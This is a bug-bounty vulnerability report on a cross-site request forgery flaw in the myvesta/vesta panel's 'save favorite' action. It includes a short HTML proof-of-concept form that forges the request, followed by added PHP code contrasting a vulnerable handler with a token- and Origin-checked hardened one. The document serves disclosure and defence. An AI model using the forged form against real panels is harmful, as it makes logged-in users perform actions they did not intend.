Cross-Site Request Forgery (CSRF) in myvesta/vesta


Reported on

Aug 24th 2021

✍️ Description

An attacker can make a logged-in user add an element to their favorites. The vulnerability affects several sections; for example, the “Firewall” tab at list/firewall/. The request that saves a favorite carries only v_unit_id and v_section, with no anti-CSRF token, so a page on any other origin can submit it and the browser attaches the victim's session cookie.

🕵️‍♂️ Proof of Concept

1. While logged in to the panel, open this POC.html in a browser and submit the form: the first record of the section is saved as a favorite without the user intending it.

<script>history.pushState('', '', '/')</script>
<!-- action is left empty as in the original report; the target URL is not given there -->
<form action="">
  <input type="hidden" name="v_unit_id" value="11" />
  <input type="hidden" name="v_section" value="firewall" />
  <input type="submit" value="Submit request" />
</form>
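The handler shape behind this report, and the checks that close it, as an added example in PHP (the language vesta is written in). This is not code from the vesta project, from its fix commit, or from the report: it models a minimal "save favorite" endpoint that takes the two parameters the PoC sends, first in the vulnerable form (the session cookie is the only thing checked) and then hardened with a per-session token plus method and Origin checks. All function names, the site origin and the sample session data are hypothetical.

```php
<?php
// Added example, not vesta code. saveFavoriteVulnerable() has the shape the
// report describes: any request carrying a valid session cookie is honoured, so
// the cross-origin form in the PoC succeeds. saveFavoriteHardened() adds the
// controls that stop it. Names and sample data are hypothetical.
declare(strict_types=1);

// Issue one random anti-CSRF token per session (call right after login) and
// echo it into every form as a hidden field; a page on another origin cannot read it.
function issueCsrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Vulnerable shape: the session cookie is the only credential checked.
function saveFavoriteVulnerable(array $session, array $params, array &$favorites): bool
{
    if (empty($session['user']) || !isset($params['v_unit_id'], $params['v_section'])) {
        return false;
    }
    $favorites[$session['user']][] = [$params['v_section'], (int) $params['v_unit_id']];
    return true;
}

// Hardened shape: POST only, same-origin only, and a token that matches the
// session, compared in constant time. $method and $origin stand in for
// $_SERVER['REQUEST_METHOD'] and $_SERVER['HTTP_ORIGIN'] so the function is testable.
function saveFavoriteHardened(
    array $session,
    string $method,
    ?string $origin,
    array $params,
    string $siteOrigin,
    array &$favorites
): bool {
    if (empty($session['user']) || !isset($params['v_unit_id'], $params['v_section'])) {
        return false;
    }
    // State changes only over POST: a bare <a href> or <img src> cannot trigger them.
    if ($method !== 'POST') {
        return false;
    }
    // Browsers attach Origin to cross-site form posts and scripts cannot alter it.
    // A present-but-foreign value is rejected; an absent one falls through to the
    // token check, which is the primary control.
    if ($origin !== null && $origin !== $siteOrigin) {
        return false;
    }
    $token = $params['token'] ?? '';
    if (!is_string($token) || $token === '' || empty($session['csrf_token'])
        || !hash_equals($session['csrf_token'], $token)) {
        return false;
    }
    $favorites[$session['user']][] = [$params['v_section'], (int) $params['v_unit_id']];
    return true;
}

// Constructed scenario: a logged-in admin, and the exact parameters from the PoC
// arriving from an attacker-controlled origin.
$session   = ['user' => 'admin'];
$favorites = [];
issueCsrfToken($session);
$site   = 'https://panel.example:8083';
$forged = ['v_unit_id' => '11', 'v_section' => 'firewall'];

printf("vulnerable handler, forged request: %s\n",
    var_export(saveFavoriteVulnerable($session, $forged, $favorites), true));
printf("hardened handler, foreign Origin:   %s\n",
    var_export(saveFavoriteHardened($session, 'POST', 'https://attacker.example', $forged, $site, $favorites), true));
printf("hardened handler, no token:         %s\n",
    var_export(saveFavoriteHardened($session, 'POST', $site, $forged, $site, $favorites), true));
printf("hardened handler, GET with token:   %s\n",
    var_export(saveFavoriteHardened($session, 'GET', $site, $forged + ['token' => $session['csrf_token']], $site, $favorites), true));
printf("hardened handler, genuine submit:   %s\n",
    var_export(saveFavoriteHardened($session, 'POST', $site, $forged + ['token' => $session['csrf_token']], $site, $favorites), true));
```

The token check is what the PoC form cannot satisfy: it would need a value that only the victim's own pages receive. The Origin and method checks are defence in depth, and a SameSite attribute on the session cookie (session_set_cookie_params(['samesite' => 'Lax', 'secure' => true, 'httponly' => true]) on PHP 7.3 and later) adds a third layer that stops the browser from sending the cookie with cross-site top-level POSTs at all. The page names fix commit 475fe4 but does not show its contents, so none of the above should be read as what that commit does.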

💥 Impact

This vulnerability allows an attacker to force an admin or any other logged-in user to save a favorite they did not intend to.

💥 Test

Tested on Edge, Firefox, Chrome and Safari

📍 Location

index.php#L1

📝 References

csrf



We have contacted a member of the myvesta/vesta team and are waiting to hear back
Musio modified the report
myvesta validated this vulnerability
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta marked this as fixed with commit 475fe4
myvesta has been awarded the fix bounty
This vulnerability will not receive a CVE